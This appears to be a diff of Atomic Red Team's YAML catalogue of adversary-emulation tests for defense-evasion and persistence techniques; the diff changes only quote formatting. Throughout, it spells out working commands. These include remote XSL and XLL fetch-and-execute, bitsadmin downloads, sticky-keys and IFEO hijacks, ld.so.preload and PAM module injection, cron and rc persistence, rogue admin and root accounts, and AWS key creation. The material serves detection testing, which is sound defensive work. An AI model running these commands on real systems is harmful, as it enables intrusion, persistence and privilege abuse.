defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) - ' +' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 - ' +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1220: @@ -39725,37 +39725,37 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) - ' +' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) - ' +' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) - ' +' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" - ' +' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del #{msxsl_exe} >nul 2>&1 - ' +' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 @@ -39783,26 +39783,26 @@ defense-evasion: dependencies: - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) - ' +' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" - ' +' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1 - ' +' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. - ' +' supported_platforms: - windows input_arguments: @@ -39818,17 +39818,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) - ' +' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" - ' +' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -39836,7 +39836,7 @@ defense-evasion: payload. Open Calculator.exe when test successfully executed, while AV turned off. - ' +' supported_platforms: - windows input_arguments: @@ -39851,7 +39851,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" - ' +' name: command_prompt persistence: T1546.008: @@ -39945,7 +39945,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -39953,7 +39953,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -39987,7 +39987,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: @@ -39998,7 +39998,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1098: @@ -40075,7 +40075,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name - ' +' supported_platforms: - windows executor: @@ -40141,7 +40141,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory - ' +' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -40164,14 +40164,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False - ' +' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss - ' +' supported_platforms: - iaas:aws input_arguments: @@ -40183,14 +40183,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test - ' +' executor: command: | aws iam create-group --group-name #{username} @@ -40404,7 +40404,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" - ' +' T1098.001: technique: external_references: @@ -40511,14 +40511,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -40591,14 +40591,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -40642,7 +40642,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised - ' +' supported_platforms: - iaas:aws input_arguments: @@ -40653,14 +40653,14 @@ persistence: dependencies: - description: 'Check if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic - ' +' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds @@ -40855,11 +40855,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -40868,11 +40868,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -40880,10 +40880,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: @@ -40991,31 +40991,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -41108,7 +41108,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: @@ -41124,30 +41124,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -41244,7 +41244,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -41428,10 +41428,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -41455,10 +41455,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -41496,7 +41496,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -41528,10 +41528,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 - ' +' name: command_prompt T1547: technique: @@ -41856,7 +41856,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds - ' +' supported_platforms: - linux - windows @@ -41876,7 +41876,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. - ' +' supported_platforms: - windows - macos @@ -41996,7 +41996,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42041,7 +42041,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42079,7 +42079,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42196,10 +42196,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1136.003: @@ -42269,7 +42269,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time - ' +' supported_platforms: - iaas:aws input_arguments: @@ -42280,21 +42280,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: 'cat ~/.aws/credentials | grep "default" - ' +' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: 'aws iam create-user --user-name #{username} - ' +' cleanup_command: 'aws iam delete-user --user-name #{username} - ' +' name: sh elevation_required: false T1078.004: @@ -42360,7 +42360,7 @@ persistence: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -42395,20 +42395,20 @@ persistence: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1542.002: technique: created: '2019-12-19T20:21:21.669Z' @@ -42645,7 +42645,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -42656,17 +42656,17 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -42678,7 +42678,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -42689,20 +42689,20 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1136: @@ -42884,7 +42884,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -42904,7 +42904,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -42912,7 +42912,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -42944,7 +42944,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -42961,10 +42961,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -43139,10 +43139,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -43150,7 +43150,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -43270,7 +43270,7 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -43281,10 +43281,10 @@ persistence: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1136.002: @@ -43336,7 +43336,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -43358,14 +43358,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -43380,10 +43380,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain - ' +' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -43391,7 +43391,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User - ' +' supported_platforms: - windows input_arguments: @@ -43420,7 +43420,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" - ' +' name: powershell elevation_required: false T1078.002: @@ -43783,21 +43783,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -43822,18 +43822,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1546.014: technique: @@ -43894,7 +43894,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -44183,7 +44183,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: @@ -44196,12 +44196,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -44421,7 +44421,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -44437,19 +44437,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -44633,7 +44633,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -44657,10 +44657,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -44669,7 +44669,7 @@ persistence: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -44875,7 +44875,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -44892,15 +44892,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true @@ -44994,7 +44994,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -45011,15 +45011,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -45163,7 +45163,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd - ' +' supported_platforms: - linux input_arguments: @@ -45174,17 +45174,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - ' +' cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl - ' +' supported_platforms: - macos input_arguments: @@ -45206,7 +45206,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} - ' +' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -45228,10 +45228,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" - ' +' cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create a new user in PowerShell @@ -45249,10 +45249,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword - ' +' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -45260,7 +45260,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. - ' +' supported_platforms: - linux input_arguments: @@ -45278,14 +45278,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -45303,7 +45303,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1078.003: @@ -45431,7 +45431,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -45660,7 +45660,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -45671,7 +45671,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1556.004: technique: @@ -46040,11 +46040,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" - ' +' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 - ' +' name: command_prompt T1137.003: technique: @@ -46179,11 +46179,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f - ' +' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 - ' +' T1137.005: technique: external_references: @@ -46304,7 +46304,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -46317,14 +46317,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -46740,7 +46740,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -46847,10 +46847,10 @@ persistence: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -46884,35 +46884,35 @@ persistence: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1205.001: technique: external_references: @@ -47045,11 +47045,11 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.013: @@ -47135,7 +47135,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -47151,13 +47151,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" @@ -47375,14 +47375,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -47398,12 +47398,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -47419,7 +47419,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' 